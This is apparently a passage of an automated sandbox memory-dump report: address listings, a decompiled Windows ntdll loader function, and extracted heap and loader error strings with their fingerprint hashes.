                                          0x0197a231
                                          0x0197a23f
                                          0x0197a242
                                          0x0197a244
                                          0x0197a24c
                                          0x0197a255
                                          0x0197a25a
                                          0x0197a25f
                                          0x019c1c76
                                          0x019c1c78
                                          0x019c1c7e
                                          0x019c1c7f
                                          0x019c1c81
                                          0x019c1c82
                                          0x019c1c84
                                          0x019c1c89
                                          0x019c1c8b
                                          0x019c1c9e
                                          0x019c1c9e
                                          0x019c1cab
                                          0x019c1cb2
                                          0x00000000
                                          0x019c1cb2
                                          0x019c1c8d
                                          0x019c1c92
                                          0x00000000
                                          0x00000000
                                          0x019c1c94
                                          0x019c1c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x019c1c98
                                          0x0197a265
                                          0x0197a265
                                          0x0197a266
                                          0x0197a26f
                                          0x0197a270
                                          0x0197a276
                                          0x0197a277
                                          0x0197a279
                                          0x0197a27e
                                          0x0197a282
                                          0x019c1db5
                                          0x019c1dbb
                                          0x019c1dc1
                                          0x019c1dc5
                                          0x019c1de4
                                          0x019c1de9
                                          0x019c1dc7
                                          0x019c1ddc
                                          0x019c1de1
                                          0x019c1def
                                          0x019c1df3
                                          0x019c1df7
                                          0x019c1dfe
                                          0x019c1e06
                                          0x0197a302
                                          0x0197a308
                                          0x0197a308
                                          0x0197a288
                                          0x0197a28d
                                          0x0197a294
                                          0x019c1cc1
                                          0x0197a29a
                                          0x0197a29a
                                          0x0197a29a
                                          0x0197a29f
                                          0x019c1ccb
                                          0x019c1cd1
                                          0x019c1cd8
                                          0x019c1cea
                                          0x019c1cea
                                          0x019c1cd8
                                          0x0197a2a9
                                          0x0197a2af
                                          0x0197a2bc
                                          0x019c1cfd
                                          0x0197a2c2
                                          0x0197a2c2
                                          0x0197a2c2
                                          0x0197a2c7
                                          0x019c1d07
                                          0x019c1d0d
                                          0x019c1d14
                                          0x019c1d1f
                                          0x019c1d21
                                          0x019c1d2c
                                          0x019c1d2c
                                          0x019c1d2c
                                          0x019c1d47
                                          0x019c1d47
                                          0x019c1d14
                                          0x0197a2cd
                                          0x0197a2d2
                                          0x0197a2d9
                                          0x019c1d5a
                                          0x0197a2df
                                          0x0197a2df
                                          0x0197a2df
                                          0x0197a2e4
                                          0x019c1d69
                                          0x019c1d6b
                                          0x019c1d76
                                          0x019c1d76
                                          0x019c1d76
                                          0x019c1d91
                                          0x019c1d91
                                          0x0197a2ea
                                          0x0197a2f0
                                          0x0197a2f5
                                          0x019c1da8
                                          0x019c1dad
                                          0x019c1dad
                                          0x0197a2fd
                                          0x0197a300
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 2994545307-2586055223
                                          • Opcode ID: 49f0715d43111c81fd6b335ae9516e63e15033c7d2be4856c9c1961cfdc85d00
                                          • Instruction ID: 5185ebcbbb43a77233d0a6a8a52e8b434dd436bd23d704b2ac224f290b98e520
                                          • Opcode Fuzzy Hash: 49f0715d43111c81fd6b335ae9516e63e15033c7d2be4856c9c1961cfdc85d00
                                          • Instruction Fuzzy Hash: A55106322056819FD712DB68C848F6B7BE9FF80B50F090868F999CB292D734D900CB66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E01988E00(void* __ecx) {
                                          				signed int _v8;
                                          				char _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr* _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t43;
                                          				void* _t46;
                                          				intOrPtr _t47;
                                          				void* _t48;
                                          				signed int _t49;
                                          				void* _t50;
                                          				intOrPtr* _t51;
                                          				signed int _t52;
                                          				void* _t53;
                                          				intOrPtr _t55;
                                          
                                          				_v8 =  *0x1a4d360 ^ _t52;
                                          				_t49 = 0;
                                          				_t48 = __ecx;
                                          				_t55 =  *0x1a48464; // 0x73b80110
                                          				if(_t55 == 0) {
                                          					L9:
                                          					if( !_t49 >= 0) {
                                          						if(( *0x1a45780 & 0x00000003) != 0) {
                                          							E019D5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                          						}
                                          						if(( *0x1a45780 & 0x00000010) != 0) {
                                          							asm("int3");
                                          						}
                                          					}
                                          					return E0199B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                          				}
                                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                          				_t43 =  *0x1a47984; // 0x1692b20
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                          					if(_t48 == _t43) {
                                          						_t50 = 0x5c;
                                          						if( *_t32 == _t50) {
                                          							_t46 = 0x3f;
                                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                          								_t32 = _t32 + 8;
                                          							}
                                          						}
                                          					}
                                          					_t51 =  *0x1a48464; // 0x73b80110
                                          					 *0x1a4b1e0(_t47, _t32,  &_v12);
                                          					_t49 =  *_t51();
                                          					if(_t49 >= 0) {
                                          						L8:
                                          						_t35 = _v12;
                                          						if(_t35 != 0) {
                                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                          								E01989B10( *((intOrPtr*)(_t48 + 0x48)));
                                          								_t35 = _v12;
                                          							}
                                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                          						}
                                          						goto L9;
                                          					}
                                          					if(_t49 != 0xc000008a) {
                                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                          							if(_t49 != 0xc00000bb) {
                                          								goto L8;
                                          							}
                                          						}
                                          					}
                                          					if(( *0x1a45780 & 0x00000005) != 0) {
                                          						_push(_t49);
                                          						E019D5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                          						_t53 = _t53 + 0x1c;
                                          					}
                                          					_t49 = 0;
                                          					goto L8;
                                          				} else {
                                          					goto L9;
                                          				}
                                          			}




















                                          0x01988e0f
                                          0x01988e16
                                          0x01988e19
                                          0x01988e1b
                                          0x01988e21
                                          0x01988e7f
                                          0x01988e85
                                          0x019c9354
                                          0x019c936c
                                          0x019c9371
                                          0x019c937b
                                          0x019c9381
                                          0x019c9381
                                          0x019c937b
                                          0x01988e9d
                                          0x01988e9d
                                          0x01988e29
                                          0x01988e2c
                                          0x01988e38
                                          0x01988e3e
                                          0x01988e43
                                          0x01988eb5
                                          0x01988eb9
                                          0x019c92aa
                                          0x019c92af
                                          0x019c92e8
                                          0x019c92e8
                                          0x019c92af
                                          0x01988eb9
                                          0x01988e45
                                          0x01988e53
                                          0x01988e5b
                                          0x01988e5f
                                          0x01988e78
                                          0x01988e78
                                          0x01988e7d
                                          0x01988ec3
                                          0x01988ecd
                                          0x01988ed2
                                          0x01988ed2
                                          0x01988ec5
                                          0x01988ec5
                                          0x00000000
                                          0x01988e7d
                                          0x01988e67
                                          0x01988ea4
                                          0x019c931a
                                          0x00000000
                                          0x00000000
                                          0x019c9320
                                          0x01988ea4
                                          0x01988e70
                                          0x019c9325
                                          0x019c9340
                                          0x019c9345
                                          0x019c9345
                                          0x01988e76
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Strings
                                          • LdrpFindDllActivationContext, xrefs: 019C9331, 019C935D
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 019C933B, 019C9367
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 019C932A
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 019C9357
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 0-3779518884
                                          • Opcode ID: fe6bc03d71a4a5a390370bacf187388d90b0c141dd62289a9202bfe4a7bfb373
                                          • Instruction ID: 92a18141ddec84ab6322ddc99577b3f2f5c51b2339254e75fd3ab3b91be061af
                                          • Opcode Fuzzy Hash: fe6bc03d71a4a5a390370bacf187388d90b0c141dd62289a9202bfe4a7bfb373
                                          • Instruction Fuzzy Hash: 0E412735A003199FEB36BB1C884CE35B6A9AB84706F854529D90D570D3E760BD80C3A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 2994545307-336120773
                                          • Opcode ID: 2a3d86a2d33f6f3f792fb23ccf2bdf3a7da1cb30060a4f25389600131f1e19a1
                                          • Instruction ID: f5311b31c8d20ad4e3f0af0b6315932aacd2fddb39ba05d07d99ad1bb417e656
                                          • Opcode Fuzzy Hash: 2a3d86a2d33f6f3f792fb23ccf2bdf3a7da1cb30060a4f25389600131f1e19a1
                                          • Instruction Fuzzy Hash: D731F236200101EFD760DBADC885F6677A9EB88760F1A4069F90AEB295D770A940CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: f123d8e2b24beb820bacad22e361d427237279cda05e3b9712cf4f5c9f336ef5
                                          • Instruction ID: 15fb45f29c2a16b0990c543a96a75294f78315dbeeede3f23be38d67ea772788
                                          • Opcode Fuzzy Hash: f123d8e2b24beb820bacad22e361d427237279cda05e3b9712cf4f5c9f336ef5
                                          • Instruction Fuzzy Hash: 9722C270600242DFEB15DF2DC454B7ABBB9EF85B05F18856DE48E8B282D731D885CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpDoPostSnapWork, xrefs: 019B9C1E
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 019B9C28
                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 019B9C18
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 2994545307-1948996284
                                          • Opcode ID: 48bf455681b121f9b07c7c6bd30b1317a258d5187f78ead69d896b04da9bb56e
                                          • Instruction ID: f20a00f335e49f14d634eb49fff144c2777d8da4f2b38857a3cdb83313ca59cd
                                          • Opcode Fuzzy Hash: 48bf455681b121f9b07c7c6bd30b1317a258d5187f78ead69d896b04da9bb56e
                                          • Instruction Fuzzy Hash: CE91E071A0031AEFEF28DF59D481ABAB7BDFF84315B144169DA1DAB241D730E901CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • HEAP[%wZ]: , xrefs: 019CA0AD
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 019CA0CD
                                          • HEAP: , xrefs: 019CA0BA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: 65fc7d02b4687a049ff35a90f0fb80d1302f8a3ad01e473e88cde482ad5064cf
                                          • Instruction ID: 213b81e648ca71da6e14d9430d58248edb05a158274fe6f3d3173f38efb4fb5b
                                          • Opcode Fuzzy Hash: 65fc7d02b4687a049ff35a90f0fb80d1302f8a3ad01e473e88cde482ad5064cf
                                          • Instruction Fuzzy Hash: 2F81F531200645AFD726DFACC884F69BBF8FF05705F0445AAE549CB692E774E940CB11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-1334570610
                                          • Opcode ID: 0bf9475e08f72b793411c8f6c19907daefd4a3d7a6bcd003668e01703fc116e3
                                          • Instruction ID: 6a642e32ece8e9995d5af326dade6e570ff37100b9a717cb87342a3ba35a18e4
                                          • Opcode Fuzzy Hash: 0bf9475e08f72b793411c8f6c19907daefd4a3d7a6bcd003668e01703fc116e3
                                          • Instruction Fuzzy Hash: D961BE74600241DFDB29CF28C485BAABBE5FF44715F18856EE84E8B646D730E881CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • LdrpCompleteMapModule, xrefs: 019B9898
                                          • minkernel\ntdll\ldrmap.c, xrefs: 019B98A2
                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 019B9891
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                          • API String ID: 0-1676968949
                                          • Opcode ID: 80d02aa91cc962d33ec8875a22b9c953c90e7c38d2ee7b3a8c6289cc73f9e6af
                                          • Instruction ID: 43889f0bd029262aaade7c484b669c9a5250e52ef04088b6676a80917095bb81
                                          • Opcode Fuzzy Hash: 80d02aa91cc962d33ec8875a22b9c953c90e7c38d2ee7b3a8c6289cc73f9e6af
                                          • Instruction Fuzzy Hash: CE51E1716007469BE72ACBACCE84F6A7BECAB40718F040959EA599B3E1D734E904C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • InstallLanguageFallback, xrefs: 0195E6DB
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0195E68C
                                          • @, xrefs: 0195E6C0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: 7037167102306c604c39c8b38c600c73ce8215973d0d240d4def9734aae55ea0
                                          • Instruction ID: 69c379b389cbc94953dcf9b226d10ec698e24098ada19c9450e2a1deb560d735
                                          • Opcode Fuzzy Hash: 7037167102306c604c39c8b38c600c73ce8215973d0d240d4def9734aae55ea0
                                          • Instruction Fuzzy Hash: 2451A3715043469BE714DF68C580AABB7EDBF88A15F05092EF98DE7240F735DA04C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          • Opcode ID: 82e9a39697bbac18169d96ba1dca5d29b0ea765ecc6c88c2edf7720e6c67eede
                                          • Instruction ID: 15207c51e42b0f3a998f7e24d2d10dd56a15fe55392dcee89967d10d88603313
                                          • Opcode Fuzzy Hash: 82e9a39697bbac18169d96ba1dca5d29b0ea765ecc6c88c2edf7720e6c67eede
                                          • Instruction Fuzzy Hash: 5911D0317041029FE769DB29C494F7AB7AAEF80A25F28856DE55FCB241D630D841CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction ID: 5c6c4012e0159a4569f4bf166bd37a12ea1f641bbec66d7eee02cf6d3c67588d
                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                          • Instruction Fuzzy Hash: 9A9182316043429FE726CF29C941B1BBBE6BF84714F18892DFA99CB284E774E904CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 22ee1a4ae5863486910d2e4cf27875de7f092ecf4af7a7095b7b8dceff2914c8
                                          • Instruction ID: 8d42bc068912cfae7f3a4120e22230110d265204ff6b4699db3b2f386ec1adae
                                          • Opcode Fuzzy Hash: 22ee1a4ae5863486910d2e4cf27875de7f092ecf4af7a7095b7b8dceff2914c8
                                          • Instruction Fuzzy Hash: 14515D71A00609DFEB25DFA9C940AAEBBF8FF98740F15842DE64DEB251DA71D900CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0197B9A5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID:
                                          • API String ID: 885266447-0
                                          • Opcode ID: 1888ad2d68e75ec5d8ce3623cad668edb4242bb7b6a0ea59deffa58c02a3e178
                                          • Instruction ID: 997f24e16c8787524e9fdad5ea2b54bf7b346c690b84ff0fb3996e060c2e994b
                                          • Opcode Fuzzy Hash: 1888ad2d68e75ec5d8ce3623cad668edb4242bb7b6a0ea59deffa58c02a3e178
                                          • Instruction Fuzzy Hash: AA514871A08301CFC724EF6DC08092ABBE9BF88615F14496EF99A87355D731E844CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: _vswprintf_s
                                          • String ID:
                                          • API String ID: 677850445-0
                                          • Opcode ID: 6b5e8d579b571c7485a3aa3e3f2413e7bf3266306bbc8db7812338683efa2be9
                                          • Instruction ID: 7585f868bd0c07e4dc0cc3c4eaf078640802fd65a945478af64b7462fcb71474
                                          • Opcode Fuzzy Hash: 6b5e8d579b571c7485a3aa3e3f2413e7bf3266306bbc8db7812338683efa2be9
                                          • Instruction Fuzzy Hash: C451D171D002698EDF25CF68CA84BEEBBB5BF40710F1041A9D85EAB282D7704945DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: PATH
                                          • API String ID: 0-1036084923
                                          • Opcode ID: 2707e5d8f008515bb98a2d0a6cbc6a193cc4bc52fde081b63f0fbfdae6b03b6d
                                          • Instruction ID: 87c474c206330f2fafb281553c69dee40713403e731e63706854dbc4e44bfdc8
                                          • Opcode Fuzzy Hash: 2707e5d8f008515bb98a2d0a6cbc6a193cc4bc52fde081b63f0fbfdae6b03b6d
                                          • Instruction Fuzzy Hash: 20C1C1B5E00209EFDB25EF99D880BBDBBB5FF88740F444429E909EB250D735A941CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 019CBE0F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                          • API String ID: 0-865735534
                                          • Opcode ID: d45d180d746bd4617093ab46998ae2f202ead796010f6dae9f51b6692b5beaec
                                          • Instruction ID: 1a8ea70f284a6acb9c6b7e885c6cff6b3046d5eadec83b2b4f4de08fbb98cb64
                                          • Opcode Fuzzy Hash: d45d180d746bd4617093ab46998ae2f202ead796010f6dae9f51b6692b5beaec
                                          • Instruction Fuzzy Hash: 30A11671F00606CBEB25EF68C450B7AB7A8AF84B51F04496DDA4ECB680DB30D941CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Re-Waiting
                                          • API String ID: 0-316354757
                                          • Opcode ID: d74d03b2f9721a8ea8be4fc594538508b212e1761a2a35db735afa0591568c50
                                          • Instruction ID: 93bc4929f90539dbda4ff4328c64e0bf99903f415249ac4a8243cf1618fbbdeb
                                          • Opcode Fuzzy Hash: d74d03b2f9721a8ea8be4fc594538508b212e1761a2a35db735afa0591568c50
                                          • Instruction Fuzzy Hash: E6613331A00645EFEB32DF6CC894BBE7BE8EB84314F540669D91DA72C1D734A94987C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 150b44880ef2b56a463573d966c96a84a0cc582de180fddbc8564b77a411f2db
                                          • Instruction ID: c538e0217a717a7c604a175e7602d49731f0cdba7b766a5fc1dc5ef168de829d
                                          • Opcode Fuzzy Hash: 150b44880ef2b56a463573d966c96a84a0cc582de180fddbc8564b77a411f2db
                                          • Instruction Fuzzy Hash: 94518B713083829FE325DF2CD984F1BBBE5EBC4614F04092CFA9697291D675E806CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction ID: 39c2ea29ddcba59b5336b8ef257df0eb57cea8616afd873b8891221f57c48940
                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction Fuzzy Hash: 6B518F716047119FC320DF19C841A6BBBF8FF98750F00892DF99987690E774E904CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: 2552289a6049dcdf093e6788c6c94f995c8d7b08bde516f6e96ec6c05a3f5aaa
                                          • Instruction ID: 7f34a50df87966fac4fc197c23c0c0336215aa96f81c66bb2b30c014a0285bdf
                                          • Opcode Fuzzy Hash: 2552289a6049dcdf093e6788c6c94f995c8d7b08bde516f6e96ec6c05a3f5aaa
                                          • Instruction Fuzzy Hash: 564161F2D0052DABDF21DA54CC85FAEB77CAB54715F4085A5AA0CAB240DB309F88CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction ID: bbfa4d861bd8056ba9fa7ab963bf88fd2a5d5fdcede2156ef28d412c440dec98
                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction Fuzzy Hash: 2D31C2326043566BE720DF28CE45F9B7BE9ABC4754F144229FA589B280E7B0E904C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: ce08fc621945658c45da95d8a2c4b17aa4233172434e16b03ef0c55856812486
                                          • Instruction ID: b115eb170c861b61970cec6c10ac19979e2794055c6af57bdfd4721d09d03ecc
                                          • Opcode Fuzzy Hash: ce08fc621945658c45da95d8a2c4b17aa4233172434e16b03ef0c55856812486
                                          • Instruction Fuzzy Hash: D031D1B290151AEFEB15DB58C945E6FBB78FB80B61F018169A91CA7290D6309F00C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 4621203e80d5e59f0ec3d52b868d7021ea700369ee9ada603678f5ed9426afef
                                          • Instruction ID: a0fe392ef685bd38d15f3521050ce2e5acbac73c9867d2d281a19686a943a583
                                          • Opcode Fuzzy Hash: 4621203e80d5e59f0ec3d52b868d7021ea700369ee9ada603678f5ed9426afef
                                          • Instruction Fuzzy Hash: DA3191B55483059FC721EF68C980E6BBBE8EFD5658F00092EF99993290D634DD05CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction ID: 6887633a6aff46c7fa4998bd79dc033c75e5e5a3b7d82fefdafd9363bb646647
                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction Fuzzy Hash: F921DA76901519ABDB229A9DC980F9FBB6DEFC1651F054536FE0C9B204D634DD00D7B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: 9db0832492f5c5c481cd2daa0524c7552a9e7b5a0f3d5b217637568fc5356f2c
                                          • Instruction ID: cbd0cf458c48f525e0db26b3abab50c2f5ea9ae005427f59ed5d4211fbd46d7f
                                          • Opcode Fuzzy Hash: 9db0832492f5c5c481cd2daa0524c7552a9e7b5a0f3d5b217637568fc5356f2c
                                          • Instruction Fuzzy Hash: 6611B235308B028BFB254E1D8891B36F6DDEF85725F25492AE57DEB391EB70C8408741
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Critical error detected %lx, xrefs: 01A08E21
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Critical error detected %lx
                                          • API String ID: 0-802127002
                                          • Opcode ID: ad08431768338463a406ecdaf9d93b2a52fc25bed5e59f59ec3f022dbe9f3bbe
                                          • Instruction ID: 94431a90587fecead8414b42adc4e64fd315be4601bb4213305ba2270d5d037d
                                          • Opcode Fuzzy Hash: ad08431768338463a406ecdaf9d93b2a52fc25bed5e59f59ec3f022dbe9f3bbe
